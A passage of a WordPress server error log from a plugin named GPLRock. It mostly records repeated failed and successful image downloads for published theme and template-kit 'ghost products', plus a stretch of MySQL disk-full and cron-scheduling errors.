delipress-magazine-and-review-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:16 UTC] GPLRock: Image download failed for product delipress-magazine-and-review-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/delipress---magazine-and-review-wordpress-theme-6244.webp for product delipress-magazine-and-review-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:18 UTC] GPLRock: Image download failed for product delipress-magazine-and-review-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:20 UTC] GPLRock: Image download failed for product delipress-magazine-and-review-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/delipress---magazine-and-review-wordpress-theme-6244.webp for product delipress-magazine-and-review-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:22 UTC] GPLRock WARNING: Image download failed for product delipress-magazine-and-review-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/delipress---magazine-and-review-wordpress-theme-6244.webp [03-Apr-2026 17:24:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: delipress-magazine-and-review-wordpress-theme [03-Apr-2026 17:24:22 UTC] GPLRock: Image download failed for product ravaio-modern-responsive-phpbb-forum-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:24 UTC] GPLRock: Image download failed for product ravaio-modern-responsive-phpbb-forum-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ravaio---modern-responsive-phpbb-forum-theme-30747.webp for product ravaio-modern-responsive-phpbb-forum-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:26 UTC] GPLRock: Image download failed for product ravaio-modern-responsive-phpbb-forum-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:28 UTC] GPLRock: Image download failed for product ravaio-modern-responsive-phpbb-forum-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ravaio---modern-responsive-phpbb-forum-theme-30747.webp for product ravaio-modern-responsive-phpbb-forum-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:31 UTC] GPLRock WARNING: Image download failed for product ravaio-modern-responsive-phpbb-forum-theme. URL: https://meldwp.com/wp-content/uploads/ravaio---modern-responsive-phpbb-forum-theme-30747.webp [03-Apr-2026 17:24:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ravaio-modern-responsive-phpbb-forum-theme [03-Apr-2026 17:24:31 UTC] GPLRock: Image download failed for product medirus-medical-health-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:33 UTC] GPLRock: Image download failed for product medirus-medical-health-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medirus---medical-health-wordpress-theme-32855.webp for product medirus-medical-health-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:35 UTC] GPLRock: Image download failed for product medirus-medical-health-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:37 UTC] GPLRock: Image download failed for product medirus-medical-health-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 17:24:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medirus---medical-health-wordpress-theme-32855.webp for product medirus-medical-health-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 17:24:39 UTC] GPLRock WARNING: Image download failed for product medirus-medical-health-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/medirus---medical-health-wordpress-theme-32855.webp [03-Apr-2026 17:24:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medirus-medical-health-wordpress-theme [04-Apr-2026 01:06:23 UTC] GPLRock: Image downloaded successfully for product ngapal-sea-luxury-yatch-vacation-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-96ce282f.webp [04-Apr-2026 01:06:23 UTC] GPLRock: Using pre-downloaded image for product ngapal-sea-luxury-yatch-vacation-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-96ce282f.webp [04-Apr-2026 01:06:23 UTC] GPLRock: Ghost product published with image - Product ID: ngapal-sea-luxury-yatch-vacation-services-elementor-template-kit [04-Apr-2026 01:06:25 UTC] GPLRock: Image downloaded successfully for product nftx-nft-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c340b96f.webp [04-Apr-2026 01:06:25 UTC] GPLRock: Using pre-downloaded image for product nftx-nft-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c340b96f.webp [04-Apr-2026 01:06:25 UTC] GPLRock: Ghost product published with image - Product ID: nftx-nft-portfolio-elementor-template-kit [04-Apr-2026 01:06:26 UTC] GPLRock: Image downloaded successfully for product nextrecord-recording-sound-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d27730f1.jpg [04-Apr-2026 01:06:27 UTC] GPLRock: Using pre-downloaded image for product nextrecord-recording-sound-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d27730f1.jpg [04-Apr-2026 01:06:27 UTC] GPLRock: Ghost product published with image - Product ID: nextrecord-recording-sound-studio-elementor-template-kit [04-Apr-2026 01:06:28 UTC] GPLRock: Image downloaded successfully for product nextone-painting-wallpapering-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-39ec35e5.webp [04-Apr-2026 01:06:28 UTC] GPLRock: Using pre-downloaded image for product nextone-painting-wallpapering-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-39ec35e5.webp [04-Apr-2026 01:06:28 UTC] GPLRock: Ghost product published with image - Product ID: nextone-painting-wallpapering-service-elementor-template-kit [04-Apr-2026 01:06:29 UTC] GPLRock: Image downloaded successfully for product next-co-startup-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-155f437a.webp [04-Apr-2026 01:06:29 UTC] GPLRock: Using pre-downloaded image for product next-co-startup-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-155f437a.webp [04-Apr-2026 01:06:30 UTC] GPLRock: Ghost product published with image - Product ID: next-co-startup-company-elementor-template-kit [04-Apr-2026 01:06:31 UTC] GPLRock: Image downloaded successfully for product next-business-coworking-space-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-327ec776.webp [04-Apr-2026 01:06:31 UTC] GPLRock: Using pre-downloaded image for product next-business-coworking-space-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-327ec776.webp [04-Apr-2026 01:06:31 UTC] GPLRock: Ghost product published with image - Product ID: next-business-coworking-space-elementor-template-kit [04-Apr-2026 01:06:33 UTC] GPLRock: Image downloaded successfully for product new-estate-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-32d81d50.webp [04-Apr-2026 01:06:33 UTC] GPLRock: Using pre-downloaded image for product new-estate-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-32d81d50.webp [04-Apr-2026 01:06:33 UTC] GPLRock: Ghost product published with image - Product ID: new-estate-real-estate-elementor-template-kit [04-Apr-2026 01:06:34 UTC] GPLRock: Image downloaded successfully for product neufam-dog-breeder-kennel-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a748d39c.webp [04-Apr-2026 01:06:34 UTC] GPLRock: Using pre-downloaded image for product neufam-dog-breeder-kennel-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a748d39c.webp [04-Apr-2026 01:06:34 UTC] GPLRock: Ghost product published with image - Product ID: neufam-dog-breeder-kennel-club-elementor-template-kit [04-Apr-2026 01:06:36 UTC] GPLRock: Image downloaded successfully for product netzo-nft-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5c332548.webp [04-Apr-2026 01:06:36 UTC] GPLRock: Using pre-downloaded image for product netzo-nft-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5c332548.webp [04-Apr-2026 01:06:36 UTC] GPLRock: Ghost product published with image - Product ID: netzo-nft-portfolio-elementor-template-kit [04-Apr-2026 01:06:37 UTC] GPLRock: Image downloaded successfully for product nepolis-nail-salon-beauty-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9bdcf011.webp [04-Apr-2026 01:06:37 UTC] GPLRock: Using pre-downloaded image for product nepolis-nail-salon-beauty-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9bdcf011.webp [04-Apr-2026 01:06:37 UTC] GPLRock: Ghost product published with image - Product ID: nepolis-nail-salon-beauty-care-elementor-template-kit [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64db.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64dc.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64df.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_reschedule_event, wp_schedule_event, _set_cron_array, update_option [04-Apr-2026 01:18:43 UTC] Cron reschedule event error for hook: litespeed_task_lqip, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"litespeed_filter","args":[],"interval":900} [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64e0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_unschedule_event, _set_cron_array, update_option [04-Apr-2026 01:18:43 UTC] Cron unschedule event error for hook: litespeed_task_lqip, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"litespeed_filter","args":[],"interval":900} [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64e1.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_reschedule_event, wp_schedule_event, _set_cron_array, update_option [04-Apr-2026 01:18:43 UTC] Cron reschedule event error for hook: action_scheduler_run_queue, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"every_minute","args":["WP Cron"],"interval":60} [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64e2.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_unschedule_event, _set_cron_array, update_option [04-Apr-2026 01:18:43 UTC] Cron unschedule event error for hook: action_scheduler_run_queue, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"every_minute","args":["WP Cron"],"interval":60} [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64e4.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_actionscheduler_claims` made by do_action_ref_array('action_scheduler_run_queue'), WP_Hook->do_action, WP_Hook->apply_filters, ActionScheduler_QueueRunner->run, ActionScheduler_QueueRunner->do_batch, ActionScheduler_DBStore->stake_claim, ActionScheduler_DBStore->generate_claim_id [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64e7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_reschedule_event, wp_schedule_event, _set_cron_array, update_option [04-Apr-2026 01:18:43 UTC] Cron reschedule event error for hook: wp_privacy_delete_old_export_files, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"hourly","args":[],"interval":3600} [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64e8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_unschedule_event, _set_cron_array, update_option [04-Apr-2026 01:18:43 UTC] Cron unschedule event error for hook: wp_privacy_delete_old_export_files, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"hourly","args":[],"interval":3600} [04-Apr-2026 01:18:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db71c-64e9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by delete_transient, delete_option [04-Apr-2026 01:20:44 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9dc520-67f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [04-Apr-2026 01:20:44 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9dc520-680.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [04-Apr-2026 03:01:38 UTC] GPLRock: Image download failed for product hervin-creative-wordpress-ajax-portfolio-showcase-slider-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:40 UTC] GPLRock: Image download failed for product hervin-creative-wordpress-ajax-portfolio-showcase-slider-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hervin---creative-wordpress-ajax-portfolio-showcase-slider-theme-19701.webp for product hervin-creative-wordpress-ajax-portfolio-showcase-slider-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:01:43 UTC] GPLRock: Image download failed for product hervin-creative-wordpress-ajax-portfolio-showcase-slider-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:45 UTC] GPLRock: Image download failed for product hervin-creative-wordpress-ajax-portfolio-showcase-slider-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hervin---creative-wordpress-ajax-portfolio-showcase-slider-theme-19701.webp for product hervin-creative-wordpress-ajax-portfolio-showcase-slider-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:01:47 UTC] GPLRock WARNING: Image download failed for product hervin-creative-wordpress-ajax-portfolio-showcase-slider-theme. URL: https://meldwp.com/wp-content/uploads/hervin---creative-wordpress-ajax-portfolio-showcase-slider-theme-19701.webp [04-Apr-2026 03:01:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hervin-creative-wordpress-ajax-portfolio-showcase-slider-theme [04-Apr-2026 03:01:47 UTC] GPLRock: Image download failed for product hypermart-fast-conversion-optimized-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:49 UTC] GPLRock: Image download failed for product hypermart-fast-conversion-optimized-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hypermart---fast-conversion-optimized-woocommerce-theme-5404.webp for product hypermart-fast-conversion-optimized-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:01:51 UTC] GPLRock: Image download failed for product hypermart-fast-conversion-optimized-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:53 UTC] GPLRock: Image download failed for product hypermart-fast-conversion-optimized-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hypermart---fast-conversion-optimized-woocommerce-theme-5404.webp for product hypermart-fast-conversion-optimized-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:01:56 UTC] GPLRock WARNING: Image download failed for product hypermart-fast-conversion-optimized-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/hypermart---fast-conversion-optimized-woocommerce-theme-5404.webp [04-Apr-2026 03:01:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hypermart-fast-conversion-optimized-woocommerce-theme [04-Apr-2026 03:01:56 UTC] GPLRock: Image download failed for product pulse-academic-personal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:01:58 UTC] GPLRock: Image download failed for product pulse-academic-personal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pulse---academic-personal-wordpress-theme-32931.webp for product pulse-academic-personal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:00 UTC] GPLRock: Image download failed for product pulse-academic-personal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:02 UTC] GPLRock: Image download failed for product pulse-academic-personal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pulse---academic-personal-wordpress-theme-32931.webp for product pulse-academic-personal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:04 UTC] GPLRock WARNING: Image download failed for product pulse-academic-personal-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pulse---academic-personal-wordpress-theme-32931.webp [04-Apr-2026 03:02:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pulse-academic-personal-wordpress-theme [04-Apr-2026 03:02:04 UTC] GPLRock: Image download failed for product uploader-advanced-media-sharing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:07 UTC] GPLRock: Image download failed for product uploader-advanced-media-sharing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/uploader---advanced-media-sharing-theme-7644.webp for product uploader-advanced-media-sharing-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:09 UTC] GPLRock: Image download failed for product uploader-advanced-media-sharing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:11 UTC] GPLRock: Image download failed for product uploader-advanced-media-sharing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/uploader---advanced-media-sharing-theme-7644.webp for product uploader-advanced-media-sharing-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:13 UTC] GPLRock WARNING: Image download failed for product uploader-advanced-media-sharing-theme. URL: https://meldwp.com/wp-content/uploads/uploader---advanced-media-sharing-theme-7644.webp [04-Apr-2026 03:02:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: uploader-advanced-media-sharing-theme [04-Apr-2026 03:02:13 UTC] GPLRock: Image download failed for product gymsick-fitness-and-gym-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:15 UTC] GPLRock: Image download failed for product gymsick-fitness-and-gym-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gymsick---fitness-and-gym-wordpress-theme-16208.webp for product gymsick-fitness-and-gym-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:17 UTC] GPLRock: Image download failed for product gymsick-fitness-and-gym-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:19 UTC] GPLRock: Image download failed for product gymsick-fitness-and-gym-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gymsick---fitness-and-gym-wordpress-theme-16208.webp for product gymsick-fitness-and-gym-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:22 UTC] GPLRock WARNING: Image download failed for product gymsick-fitness-and-gym-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gymsick---fitness-and-gym-wordpress-theme-16208.webp [04-Apr-2026 03:02:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gymsick-fitness-and-gym-wordpress-theme [04-Apr-2026 03:02:22 UTC] GPLRock: Image download failed for product artech-digital-agency-creative-portfolio-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:24 UTC] GPLRock: Image download failed for product artech-digital-agency-creative-portfolio-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artech---digital-agency--creative-portfolio-wordpress-elementor-theme-3610.webp for product artech-digital-agency-creative-portfolio-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:26 UTC] GPLRock: Image download failed for product artech-digital-agency-creative-portfolio-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:28 UTC] GPLRock: Image download failed for product artech-digital-agency-creative-portfolio-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artech---digital-agency--creative-portfolio-wordpress-elementor-theme-3610.webp for product artech-digital-agency-creative-portfolio-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:30 UTC] GPLRock WARNING: Image download failed for product artech-digital-agency-creative-portfolio-wordpress-elementor-theme. URL: https://meldwp.com/wp-content/uploads/artech---digital-agency--creative-portfolio-wordpress-elementor-theme-3610.webp [04-Apr-2026 03:02:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artech-digital-agency-creative-portfolio-wordpress-elementor-theme [04-Apr-2026 03:02:30 UTC] GPLRock: Image download failed for product bikeway-sport-shop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:33 UTC] GPLRock: Image download failed for product bikeway-sport-shop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bikeway---sport-shop-woocommerce-theme-4794.webp for product bikeway-sport-shop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:35 UTC] GPLRock: Image download failed for product bikeway-sport-shop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:37 UTC] GPLRock: Image download failed for product bikeway-sport-shop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bikeway---sport-shop-woocommerce-theme-4794.webp for product bikeway-sport-shop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:39 UTC] GPLRock WARNING: Image download failed for product bikeway-sport-shop-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/bikeway---sport-shop-woocommerce-theme-4794.webp [04-Apr-2026 03:02:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bikeway-sport-shop-woocommerce-theme [04-Apr-2026 03:02:39 UTC] GPLRock: Image download failed for product appeal-fully-functional-petition-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:41 UTC] GPLRock: Image download failed for product appeal-fully-functional-petition-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appeal--fully-functional-petition-theme-21843.webp for product appeal-fully-functional-petition-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:43 UTC] GPLRock: Image download failed for product appeal-fully-functional-petition-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:46 UTC] GPLRock: Image download failed for product appeal-fully-functional-petition-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appeal--fully-functional-petition-theme-21843.webp for product appeal-fully-functional-petition-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:48 UTC] GPLRock WARNING: Image download failed for product appeal-fully-functional-petition-theme. URL: https://meldwp.com/wp-content/uploads/appeal--fully-functional-petition-theme-21843.webp [04-Apr-2026 03:02:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: appeal-fully-functional-petition-theme [04-Apr-2026 03:02:48 UTC] GPLRock: Image download failed for product unitypress-community-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:50 UTC] GPLRock: Image download failed for product unitypress-community-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unitypress---community-club-wordpress-theme-2896.webp for product unitypress-community-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:52 UTC] GPLRock: Image download failed for product unitypress-community-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:54 UTC] GPLRock: Image download failed for product unitypress-community-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unitypress---community-club-wordpress-theme-2896.webp for product unitypress-community-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:02:56 UTC] GPLRock WARNING: Image download failed for product unitypress-community-club-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/unitypress---community-club-wordpress-theme-2896.webp [04-Apr-2026 03:02:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unitypress-community-club-wordpress-theme [04-Apr-2026 03:02:57 UTC] GPLRock: Image download failed for product alliance-intranet-extranet-buddypress-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:02:59 UTC] GPLRock: Image download failed for product alliance-intranet-extranet-buddypress-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:03:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alliance--intranet--extranet-buddypress-wordpress-theme-29564.webp for product alliance-intranet-extranet-buddypress-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:03:01 UTC] GPLRock: Image download failed for product alliance-intranet-extranet-buddypress-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 